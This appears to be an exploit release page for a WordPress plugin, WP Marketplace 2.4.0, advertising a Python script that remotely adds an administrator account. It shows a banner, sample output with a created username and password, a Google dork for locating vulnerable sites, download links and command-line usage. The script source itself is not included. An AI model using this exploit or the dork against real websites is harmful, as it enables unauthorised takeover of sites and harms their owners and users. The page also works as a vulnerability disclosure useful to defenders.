WP Marketplace 2.4.0 Remote Code Execution (Add WP Admin)

WP Markeplace

    ___ ___               __                                         
   |   Y   .-----.----.--|  .-----.----.-----.-----.-----.           
   |.  |   |  _  |   _|  _  |  _  |   _|  -__|__ --|__ --|           
   |. / \  |_____|__| |_____|   __|__| |_____|_____|_____|           
   |:      |                |__|                                     
   |::.|:. |                                                         
    `--- ---'                                                         
       ___ ___            __          __         __                  
      |   Y   .---.-.----|  |--.-----|  |_.-----|  .---.-.----.-----.
      |.      |  _  |   _|    <|  -__|   _|  _  |  |  _  |  __|  -__|
      |. \_/  |___._|__| |__|__|_____|____|   __|__|___._|____|_____|
      |:  |   |                           |__|                       
      |::.|:. |                                                      
       `--- ---'                                                      
                                                          WP Marketplace
                                                      R3m0t3 C0d3 Ex3cut10n
                                                         (Add WP Admin)
                                                             v2.4.0

                               Written by:

                             Claudio Viviani

                          http://www.homelab.it

                             info@homelab.it
                         homelabit@protonmail.ch

                   https://www.facebook.com/homelabit
                      https://twitter.com/homelabit
                    https://plus.google.com/+HomelabIt1/
           https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww

[+] Tryng to connect to: http://127.0.0.1
[!] Account Added
[!] Location: http://127.0.0.1/wp-login.php
[!] Username: yna5gM
[!] Password: Fq2Y7X

Google Dork

index of "wpmarketplace"

Download

Download:
         wp_marketplace_240_add_admin.py
         wp_marketplace_240_add_admin.py (mirror)

Usage

claudio@backbox3:~$ python wp_marketplace_240_add_admin.py -t http[s]://localhost[:PORT]
                    python wp_marketplace_240_add_admin.py -t http[s]://localhost[:PORT]/basedir